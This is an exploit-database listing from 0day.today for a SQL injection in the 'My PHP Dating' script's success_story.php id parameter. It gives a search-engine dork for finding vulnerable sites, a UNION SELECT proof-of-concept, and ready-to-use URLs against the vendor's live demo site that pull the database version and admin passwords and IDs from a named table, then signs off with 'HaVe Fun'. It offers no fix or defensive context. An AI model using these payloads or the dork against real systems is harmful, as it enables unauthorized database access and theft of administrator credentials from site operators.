[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

My PHP Dating (success_story.php id) SQL Injection Vulnerability

Author
Hakxer
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3894
Category
web applications
Date add
13-10-2008
Platform
unsorted
================================================================
My PHP Dating (success_story.php id) SQL Injection Vulnerability
================================================================


# Author : Hakxer
# Type Gap : Sq1 inj3ct1on
# script : PHP MY DATING [see script] http://www.phponlinedatingsoftware.com/demo.htm
# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 ,Bright D@rk , Thrid Devil
# Team : EgY Coders 
#################################################################################################
####### [+] Bug in : success_story.php
## Dork : " Developed by Infoware Solutions "
### POC
      http://www.site.com/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())--
	  
### Exploit iN L!ve Script 
#   [+] Get Version & Database Name [~]
#          http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(@@version,0x3e,database())--
#   [+] Get ID&Pass [~] 
#          http://www.phponlinedatingsoftware.com/demo/success_story.php?id=-2+union+select+1,2,concat(m_pass,0x3e,admin_id)+from+infowar1_cms.baq_admin--

# [+] HaVe Fun .. ^_^ ;


###############################################################################

-------------------------------- The End of Gap -----------------------------------



#  0day.today [2024-11-14]  #